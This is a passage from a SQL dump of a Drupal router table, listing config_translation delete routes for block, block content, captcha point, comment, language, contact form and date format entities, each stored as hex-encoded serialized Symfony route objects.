0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a353a22626c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a353a22626c6f636b223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39323a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a353a22626c6f636b223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.block_content_type.edit_form', '/admin/structure/block-content/manage/{block_content_type}/translate/{langcode}/delete', '/admin/structure/block-content/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38363a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131343a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.block_content_type.edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/translate/{langcode}/delete', '/admin/structure/block/block-content/manage/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132303a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36343a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.captcha_point.edit_form', '/admin/config/people/captcha/captcha-points/{captcha_point}/translate/{langcode}/delete', '/admin/config/people/captcha/captcha-points/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38373a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f7b636170746368615f706f696e747d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31333a22636170746368615f706f696e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a22636170746368615f706f696e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a636170746368615f706f696e74223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a22636170746368615f706f696e74223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368615c2d706f696e74732f283f503c636170746368615f706f696e743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22636170746368615f706f696e74223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e7473223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a22636170746368615f706f696e74223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36343a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.comment_type.edit_form', '/admin/structure/comment/manage/{comment_type}/translate/{langcode}/delete', '/admin/structure/comment/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37343a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31323a22636f6d6d656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130313a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.configurable_language.edit_form', '/admin/config/regional/language/edit/{configurable_language}/translate/{langcode}/delete', '/admin/config/regional/language/edit/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38383a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f7b636f6e666967757261626c655f6c616e67756167657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a32313a22636f6e666967757261626c655f6c616e6775616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a32313a22636f6e666967757261626c655f6c616e6775616765223b613a323a7b733a343a2274797065223b733a32383a22656e746974793a636f6e666967757261626c655f6c616e6775616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f283f503c636f6e666967757261626c655f6c616e67756167653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f65646974223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.contact_form.edit_form', '/admin/structure/contact/manage/{contact_form}/translate/{langcode}/delete', '/admin/structure/contact/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37343a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31323a22636f6e746163745f666f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130313a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.date_format.edit_form', '/admin/config/regional/date-time/formats/manage/{date_format}/translate/{langcode}/delete', '/admin/config/regional/date-time/formats/manage/%/translate/%/delete', 1013, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38393a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31313a22646174655f666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22646174655f666f726d6174223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a646174655f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22646174655f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131373a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d652f666f726d6174732f6d616e6167652f283f503c646174655f666f726d61743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22646174655f666f726d6174223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22646174655f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313031333b733a31343a227061747465726e4f75746c696e65223b733a36383a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
